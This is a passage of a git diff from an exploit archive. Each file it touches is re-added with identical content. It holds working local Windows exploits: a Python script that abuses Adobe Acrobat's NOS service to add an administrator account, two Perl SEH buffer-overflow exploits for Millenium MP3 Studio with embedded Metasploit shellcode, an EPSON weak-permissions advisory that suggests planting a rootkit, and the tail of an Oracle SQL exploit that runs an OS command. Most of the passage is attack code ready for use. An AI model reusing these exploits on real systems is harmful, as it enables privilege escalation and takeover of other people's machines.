-evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n"
-evil += "copy /Y %systemroot%\\system32\\cmd.exe\n"
-evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n"
-evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n"
-evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n"
-evil += "exit"
-
-f1 = open('Dr_IDE-Adobe.bat','w');
-f1.write(evil);
-f1.close();
-
-# Here are two ways to execute this exploit. If you leave both commented just the batch file is created.
-
-# Silent Way - This should be more stealthy
-#retval = subprocess.call("Dr_IDE-Adobe.bat");
-
-# Louder Way - On some systems this will probably open a DOS window
-#retval = os.system("Dr_IDE-Adobe.bat");
-
-# milw0rm.com [2009-07-27]
+#!/usr/bin/env python
+##################################################################################
+#
+# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit
+# Coded By: Dr_IDE
+# Discovered by: Nine:Situations:Group
+# Tested On: Windows XP SP2, Requires NOS Package Installed
+# Usage: python Dr_IDE-Adobe_912.py
+#
+##################################################################################
+
+import os, subprocess
+
+#
+# Should probably have a try block around this as not every install
+# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to
+# play around with it.
+#
+# This is a super lame way to do this but it makes it more educational.
+evil =  "echo *************************************************************\n"
+evil += "echo *\n"
+evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n"
+evil += "echo * Coded By: Dr_IDE\n"
+evil += "echo * Discovered By: Nine:Situations:Group\n"
+evil += "echo * Tested On: Windows XP SP2\n"
+evil += "echo *\n"
+evil += "echo *************************************************************\n"
+evil += "echo This will add user Dr_IDE:password to the Admin Group\n"
+evil += "cd C:\\Program Files\\NOS\\bin\n"
+evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n"
+evil += "copy /Y %systemroot%\\system32\\cmd.exe\n"
+evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n"
+evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n"
+evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n"
+evil += "exit"
+
+f1 = open('Dr_IDE-Adobe.bat','w');
+f1.write(evil);
+f1.close();
+
+# Here are two ways to execute this exploit. If you leave both commented just the batch file is created.
+
+# Silent Way - This should be more stealthy
+#retval = subprocess.call("Dr_IDE-Adobe.bat");
+
+# Louder Way - On some systems this will probably open a DOS window
+#retval = os.system("Dr_IDE-Adobe.bat");
+
+# milw0rm.com [2009-07-27]
diff --git a/platforms/windows/local/9286.pl b/platforms/windows/local/9286.pl
index 8281235a6..0cef4880e 100755
--- a/platforms/windows/local/9286.pl
+++ b/platforms/windows/local/9286.pl
@@ -1,84 +1,84 @@
-#
-# [+] Vulnerability	: (.mpf /.m3u File) Local Stack Overflow Exploit (SEH) #1
-# [+] Product		: Millenium MP3 Studio
-# [+] Versions affected : v1.0
-# [+] Download          : http://www.software112.com/products/mp3-millennium+download.html
-# [+] Method		: /
-# [+] Tested on         : Windows XP SP3 En
-# [+] Written by        : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com
-# [+] Greetz to         : Saumil & SK  :-) 
-# -----------------------------------------------------------------------------
-#                                               MMMMM~.                          
-#                                               MMMMM?.                          
-#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
-#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
-#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
-#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
-#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
-#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
-#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
-#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
-#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
-#                                                                   eip hunters
-# -----------------------------------------------------------------------------
-#
-# Script provided for educational purposes only.
-#
-#
-#
-my $junk = "http://";
-#$junk=$junk."\xcc";
-# real shellcode, will be put at ebp-1027
-# windows/exec - 303 bytes
-# http://www.metasploit.com
-# Encoder: x86/alpha_upper
-# EXITFUNC=seh, CMD=calc
-my $shellcode2="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
-"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
-"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
-"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
-"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
-"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
-"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
-"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
-"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
-"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
-"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
-"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
-"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
-"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
-"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
-"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
-"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
-"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
-"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
-"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
-"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
-"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
-$junk = $junk.$shellcode2."A" x (4099-length($shellcode2)); 
-
-my $ret= pack('V',0x770CA3E7); #eip, jmp esp from comres.dll
-my $nseh = "\xeb\x06\x90\x90"; #jump 6
-my $seh = pack('V',0x1001FF41); #pop pop ret from xaudio.dll
-
-#jumpcode
-my $shellcode="\xe9\xf4\xef\xff\xff"; #jump to 0x00124d55 (ebp-1027) #hardcoded, sorry... not enough time
-# If address is different on your system, then change the jumpcode. 
-# You have 20 bytes at your disposal (to jump to ebp-1027  :-)  )
-$shellcode=$shellcode."A"x15;  
-#
-#
-my $rest="\x00" x 10; 
-#
-#
-print "[+] Writing exploit file c0d3rsploit.m3u\n";
-open (myfile,">c0d3rsploit.m3u");
-print myfile $junk.$ret.$shellcode.$rest;
-close (myfile);
-print "[+] File written\n";
-
-
-#
-#
-
-# milw0rm.com [2009-07-28]
+#
+# [+] Vulnerability	: (.mpf /.m3u File) Local Stack Overflow Exploit (SEH) #1
+# [+] Product		: Millenium MP3 Studio
+# [+] Versions affected : v1.0
+# [+] Download          : http://www.software112.com/products/mp3-millennium+download.html
+# [+] Method		: /
+# [+] Tested on         : Windows XP SP3 En
+# [+] Written by        : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com
+# [+] Greetz to         : Saumil & SK  :-) 
+# -----------------------------------------------------------------------------
+#                                               MMMMM~.                          
+#                                               MMMMM?.                          
+#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
+#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
+#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
+#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
+#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
+#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
+#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
+#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
+#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
+#                                                                   eip hunters
+# -----------------------------------------------------------------------------
+#
+# Script provided for educational purposes only.
+#
+#
+#
+my $junk = "http://";
+#$junk=$junk."\xcc";
+# real shellcode, will be put at ebp-1027
+# windows/exec - 303 bytes
+# http://www.metasploit.com
+# Encoder: x86/alpha_upper
+# EXITFUNC=seh, CMD=calc
+my $shellcode2="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
+"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
+"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
+"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
+"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
+"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
+"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
+"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
+"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
+"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
+"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
+"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
+"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
+"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
+"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
+"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
+"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
+"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
+"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
+"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
+"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
+$junk = $junk.$shellcode2."A" x (4099-length($shellcode2)); 
+
+my $ret= pack('V',0x770CA3E7); #eip, jmp esp from comres.dll
+my $nseh = "\xeb\x06\x90\x90"; #jump 6
+my $seh = pack('V',0x1001FF41); #pop pop ret from xaudio.dll
+
+#jumpcode
+my $shellcode="\xe9\xf4\xef\xff\xff"; #jump to 0x00124d55 (ebp-1027) #hardcoded, sorry... not enough time
+# If address is different on your system, then change the jumpcode. 
+# You have 20 bytes at your disposal (to jump to ebp-1027  :-)  )
+$shellcode=$shellcode."A"x15;  
+#
+#
+my $rest="\x00" x 10; 
+#
+#
+print "[+] Writing exploit file c0d3rsploit.m3u\n";
+open (myfile,">c0d3rsploit.m3u");
+print myfile $junk.$ret.$shellcode.$rest;
+close (myfile);
+print "[+] File written\n";
+
+
+#
+#
+
+# milw0rm.com [2009-07-28]
diff --git a/platforms/windows/local/9298.pl b/platforms/windows/local/9298.pl
index 7319246ea..37ce2b7ed 100755
--- a/platforms/windows/local/9298.pl
+++ b/platforms/windows/local/9298.pl
@@ -1,89 +1,89 @@
-#
-# [+] Vulnerability	: .m3u File Local Stack Overflow Exploit (SEH) Full Rewrite
-# [+] Product		: Millenium MP3 Studio
-# [+] Versions affected : v1.0
-# [+] Download          : http://www.software112.com/products/mp3-millennium+download.html
-# [+] Method		: seh
-# [+] Tested on         : Windows XP SP3 En
-# [+] Written by        : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com
-# [+] Greetz to         : Saumil & SK
-# [+] Note : sorry for the previous version, that was a real mess
-#     I mixed up 2 sploits...
-#     This one should be a lot better
-# -----------------------------------------------------------------------------
-#                                               MMMMM~.                          
-#                                               MMMMM?.                          
-#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
-#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
-#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
-#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
-#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
-#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
-#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
-#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
-#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
-#                                                                   eip hunters
-# -----------------------------------------------------------------------------
-#
-# Script provided for educational purposes only.
-#
-#
-#
-my $sploitfile="C:\\mp3-millennium\\c0d3rmp3studio.m3u";
-my $totallen=5007;
-#
-my $junk = "http://";
-my $buffer="A" x 4103;
-my $seh = "\xeb\x1e\x90\x90";  #jump forest, jump !
-my $nseh = pack('V',0x10020BA7);  #pop pop ret from xaudio.dll
-my $nop="\x90" x 32;
-# windows/exec - 303 bytes
-# http://www.metasploit.com
-# Encoder: x86/alpha_upper
-# EXITFUNC=seh, CMD=calc
-my $shellcode="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
-"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
-"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
-"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
-"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
-"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
-"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
-"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
-"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
-"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
-"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
-"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
-"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
-"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
-"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
-"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
-"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
-"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
-"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
-"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
-"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
-"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
-
-
-my $shelllen = $totallen-length($junk)-length($buffer)-length($seh)-length($nseh)-length($nop)-length($shellcode);
-my $finalnop="\x90" x $shelllen;
-
-my $payload=$junk.$buffer.$seh.$nseh.$nop.$shellcode.$finalnop;
-#
-#
-print "[+] Writing exploit file $sploitfile\n";
-open (myfile,">$sploitfile");
-print myfile $payload;
-close (myfile);
-print "[+] ".length($payload)." bytes written to file\n";
-print "   junk : " . length($junk)."\n";
-print "    buf : " . length($buffer)."\n";
-print "    seh : " . length($seh)."\n";
-print "   nseh : " . length($nseh)."\n";
-print "    nop : " . length($nop)."\n";
-print "  shell : " . length($shellcode)."\n";
-print "   nop2 : " . length($finalnop)."\n";
-#
-#
-
-# milw0rm.com [2009-07-30]
+#
+# [+] Vulnerability	: .m3u File Local Stack Overflow Exploit (SEH) Full Rewrite
+# [+] Product		: Millenium MP3 Studio
+# [+] Versions affected : v1.0
+# [+] Download          : http://www.software112.com/products/mp3-millennium+download.html
+# [+] Method		: seh
+# [+] Tested on         : Windows XP SP3 En
+# [+] Written by        : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com
+# [+] Greetz to         : Saumil & SK
+# [+] Note : sorry for the previous version, that was a real mess
+#     I mixed up 2 sploits...
+#     This one should be a lot better
+# -----------------------------------------------------------------------------
+#                                               MMMMM~.                          
+#                                               MMMMM?.                          
+#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
+#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
+#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
+#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
+#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
+#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
+#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
+#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
+#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
+#                                                                   eip hunters
+# -----------------------------------------------------------------------------
+#
+# Script provided for educational purposes only.
+#
+#
+#
+my $sploitfile="C:\\mp3-millennium\\c0d3rmp3studio.m3u";
+my $totallen=5007;
+#
+my $junk = "http://";
+my $buffer="A" x 4103;
+my $seh = "\xeb\x1e\x90\x90";  #jump forest, jump !
+my $nseh = pack('V',0x10020BA7);  #pop pop ret from xaudio.dll
+my $nop="\x90" x 32;
+# windows/exec - 303 bytes
+# http://www.metasploit.com
+# Encoder: x86/alpha_upper
+# EXITFUNC=seh, CMD=calc
+my $shellcode="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
+"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
+"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
+"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
+"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
+"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
+"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
+"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
+"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
+"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
+"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
+"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
+"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
+"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
+"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
+"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
+"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
+"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
+"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
+"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
+"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
+
+
+my $shelllen = $totallen-length($junk)-length($buffer)-length($seh)-length($nseh)-length($nop)-length($shellcode);
+my $finalnop="\x90" x $shelllen;
+
+my $payload=$junk.$buffer.$seh.$nseh.$nop.$shellcode.$finalnop;
+#
+#
+print "[+] Writing exploit file $sploitfile\n";
+open (myfile,">$sploitfile");
+print myfile $payload;
+close (myfile);
+print "[+] ".length($payload)." bytes written to file\n";
+print "   junk : " . length($junk)."\n";
+print "    buf : " . length($buffer)."\n";
+print "    seh : " . length($seh)."\n";
+print "   nseh : " . length($nseh)."\n";
+print "    nop : " . length($nop)."\n";
+print "  shell : " . length($shellcode)."\n";
+print "   nop2 : " . length($finalnop)."\n";
+#
+#
+
+# milw0rm.com [2009-07-30]
diff --git a/platforms/windows/local/9305.txt b/platforms/windows/local/9305.txt
index 48163a3ce..8ae2e0261 100755
--- a/platforms/windows/local/9305.txt
+++ b/platforms/windows/local/9305.txt
@@ -1,49 +1,49 @@
-------- EPSON Status Monitor 3 local privilege escalation vulnerability --------
-by Nine:Situations:Group::bruiser
-site: http://retrogod.altervista.org/
---------------------------------------------------------------------------------
-After that pyrokinesis found: http://www.milw0rm.com/exploits/9199
-I prepared a tool to check for weak permissions and I come out with this:
-
-C:\>sc qc EPSON_EB_RPCV4_01
-[SC] QueryServiceConfig SUCCESS
-
-SERVICE_NAME: EPSON_EB_RPCV4_01
-        TYPE               : 10  WIN32_OWN_PROCESS
-        START_TYPE         : 2   AUTO_START
-        ERROR_CONTROL      : 1   NORMAL
-        BINARY_PATH_NAME   : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE
-        LOAD_ORDER_GROUP   :
-        TAG                : 0
-        DISPLAY_NAME       : EPSON V5 Service4(01)
-        DEPENDENCIES       : RpcSs
-        SERVICE_START_NAME : LocalSystem
-
-C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE"
-C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE Everyone:F <------[ :( !!!]
-
-C:\>SC QC EPSON_PM_RPCV4_01
-[SC] QueryServiceConfig SUCCESS
-
-SERVICE_NAME: EPSON_PM_RPCV4_01
-        TYPE               : 10  WIN32_OWN_PROCESS
-        START_TYPE         : 2   AUTO_START
-        ERROR_CONTROL      : 1   NORMAL
-        BINARY_PATH_NAME   : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE
-        LOAD_ORDER_GROUP   :
-        TAG                : 0
-        DISPLAY_NAME       : EPSON V3 Service4(01)
-        DEPENDENCIES       : RpcSs
-        SERVICE_START_NAME : LocalSystem
-
-C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE"
-C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE Everyone:F <------[ :( !!!]
-
-The executable files are installed with "full control" for Everyone; replace
-them with your favourite rootkit.
-They are carried by an EPSON STYLUS SX100 drivers cd. C'mon guys, no need for an
-exploit code, it can be triggered by the availiable command line tools.
-
---------------------------------------------------------------------------------
-
-# milw0rm.com [2009-07-30]
+------- EPSON Status Monitor 3 local privilege escalation vulnerability --------
+by Nine:Situations:Group::bruiser
+site: http://retrogod.altervista.org/
+--------------------------------------------------------------------------------
+After that pyrokinesis found: http://www.milw0rm.com/exploits/9199
+I prepared a tool to check for weak permissions and I come out with this:
+
+C:\>sc qc EPSON_EB_RPCV4_01
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: EPSON_EB_RPCV4_01
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : EPSON V5 Service4(01)
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE"
+C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE Everyone:F <------[ :( !!!]
+
+C:\>SC QC EPSON_PM_RPCV4_01
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: EPSON_PM_RPCV4_01
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : EPSON V3 Service4(01)
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE"
+C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE Everyone:F <------[ :( !!!]
+
+The executable files are installed with "full control" for Everyone; replace
+them with your favourite rootkit.
+They are carried by an EPSON STYLUS SX100 drivers cd. C'mon guys, no need for an
+exploit code, it can be triggered by the availiable command line tools.
+
+--------------------------------------------------------------------------------
+
+# milw0rm.com [2009-07-30]
diff --git a/platforms/windows/local/932.sql b/platforms/windows/local/932.sql
index 1d93a7eca..f2519868c 100755
--- a/platforms/windows/local/932.sql
+++ b/platforms/windows/local/932.sql
@@ -142,6 +142,6 @@ FFD0 CALL EAX
 */
 || 'dir>c:\dir.txt'; -- OS command to execute
 a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => AAA);
-END;
-
